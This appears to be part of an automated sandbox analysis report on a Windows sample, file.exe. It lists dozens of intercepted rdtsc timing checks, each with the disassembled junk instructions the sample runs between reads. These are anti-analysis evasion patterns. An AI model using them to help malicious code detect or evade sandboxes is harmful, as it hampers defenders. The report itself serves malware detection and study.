Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13651F7 second address: 13651FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1365365 second address: 1365369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13655DB second address: 13655FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F400D181C06h 0x0000000a jmp 00007F400D181C16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1369F10 second address: 1369F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1369F17 second address: 1369F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A07E second address: 136A09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F400D373729h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A09F second address: 136A0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A0A4 second address: 136A0C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373727h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A0C0 second address: 136A0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D181C17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A421 second address: 136A42D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400D373716h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A42D second address: 136A433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A433 second address: 136A460 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F400D373716h 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F400D373725h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1369AEC second address: 1369AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1369AF0 second address: 1369B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F400D373716h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1369B00 second address: 1369B0A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F400D181C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136A9B9 second address: 136A9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D373720h 0x00000009 jne 00007F400D373727h 0x0000000f jmp 00007F400D37371Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136AD8A second address: 136ADA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F400D181C06h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F400D181C06h 0x00000015 je 00007F400D181C06h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F1D2 second address: 136F1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F1D8 second address: 136F1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13319A1 second address: 13319A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13319A6 second address: 13319F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F400D181C08h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12485798h] 0x0000002a mov edi, dword ptr [ebp+122D2880h] 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 je 00007F400D181C06h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1331EB4 second address: 1331EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1331FB6 second address: 1331FBB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1331FBB second address: 1331FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 movzx edi, dx 0x0000000b push 946157D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F400D373726h 0x00000018 jmp 00007F400D373720h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133240A second address: 133244C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop edi 0x0000000d nop 0x0000000e mov edi, eax 0x00000010 push 00000004h 0x00000012 jmp 00007F400D181C18h 0x00000017 push eax 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F400D181C14h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133244C second address: 1332450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133283D second address: 1332843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1332BEE second address: 1332BFC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1332BFC second address: 1332C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F400D181C08h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D2AE8h] 0x00000028 lea eax, dword ptr [ebp+12485798h] 0x0000002e mov dword ptr [ebp+122D1E5Ah], edi 0x00000034 nop 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F400D181C0Bh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1332C48 second address: 1332C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1332C4C second address: 131A53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F400D181C08h 0x0000000c popad 0x0000000d push eax 0x0000000e jno 00007F400D181C1Ch 0x00000014 nop 0x00000015 mov di, si 0x00000018 call dword ptr [ebp+122D2571h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jno 00007F400D181C1Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F40E second address: 136F43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F400D373724h 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F400D37371Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F43C second address: 136F452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F400D181C10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F452 second address: 136F460 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F400D373718h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F5E1 second address: 136F5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F400D181C06h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F5F4 second address: 136F5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F5F9 second address: 136F600 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136F600 second address: 136F61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F400D373721h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1372EC0 second address: 1372EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1372EC6 second address: 1372ED9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F400D373716h 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13766FE second address: 1376702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1376702 second address: 137670E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F400D373716h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137C137 second address: 137C13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137AE68 second address: 137AE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137AE6F second address: 137AE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137AE76 second address: 137AE89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F400D373716h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F400D373716h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137AE89 second address: 137AE8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137AE8D second address: 137AEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D373725h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B14F second address: 137B155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B155 second address: 137B15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B2B3 second address: 137B2B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B2B9 second address: 137B2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F400D37371Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007F400D373716h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B2CD second address: 137B2F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F400D181C19h 0x00000008 jng 00007F400D181C06h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B2F6 second address: 137B2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B59F second address: 137B5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137B5A4 second address: 137B5AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB20 second address: 137BB2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F400D181C06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB2A second address: 137BB66 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F400D373742h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB66 second address: 137BB6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB6B second address: 137BB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB71 second address: 137BBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jg 00007F400D181C08h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F400D181C16h 0x00000015 jbe 00007F400D181C12h 0x0000001b jne 00007F400D181C06h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BFA5 second address: 137BFCB instructions: 0x00000000 rdtsc 0x00000002 js 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F400D373729h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1383972 second address: 1383978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1383978 second address: 138397E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138397E second address: 13839B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F400D181C0Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F400D181C18h 0x00000011 jmp 00007F400D181C0Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1385EE5 second address: 1385EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F400D373716h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1385EF4 second address: 1385EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1385EF8 second address: 1385EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1385EFC second address: 1385F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1385F02 second address: 1385F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1385F0F second address: 1385F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 jl 00007F400D181C06h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138AE59 second address: 138AE68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138AE68 second address: 138AE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138AE6D second address: 138AE73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A151 second address: 138A155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A155 second address: 138A15F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400D373716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A15F second address: 138A165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A165 second address: 138A16A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A2C1 second address: 138A2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F400D181C08h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e push ebx 0x0000000f push eax 0x00000010 jmp 00007F400D181C12h 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A2E9 second address: 138A305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D373726h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A5C5 second address: 138A60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D181C0Dh 0x00000009 jmp 00007F400D181C18h 0x0000000e jp 00007F400D181C06h 0x00000014 popad 0x00000015 push edi 0x00000016 jns 00007F400D181C06h 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jne 00007F400D181C06h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138A60A second address: 138A61A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F400D37371Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F122 second address: 138F128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F128 second address: 138F13B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F310 second address: 138F316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F316 second address: 138F334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F400D373725h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F334 second address: 138F338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F61C second address: 138F635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F635 second address: 138F642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F400D181C06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138F642 second address: 138F651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F400D373716h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138FB82 second address: 138FB88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138FB88 second address: 138FB99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F400D373716h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138FB99 second address: 138FBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F400D181C0Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007F400D181C08h 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 jns 00007F400D181C06h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139055F second address: 1390563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1393D2C second address: 1393D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
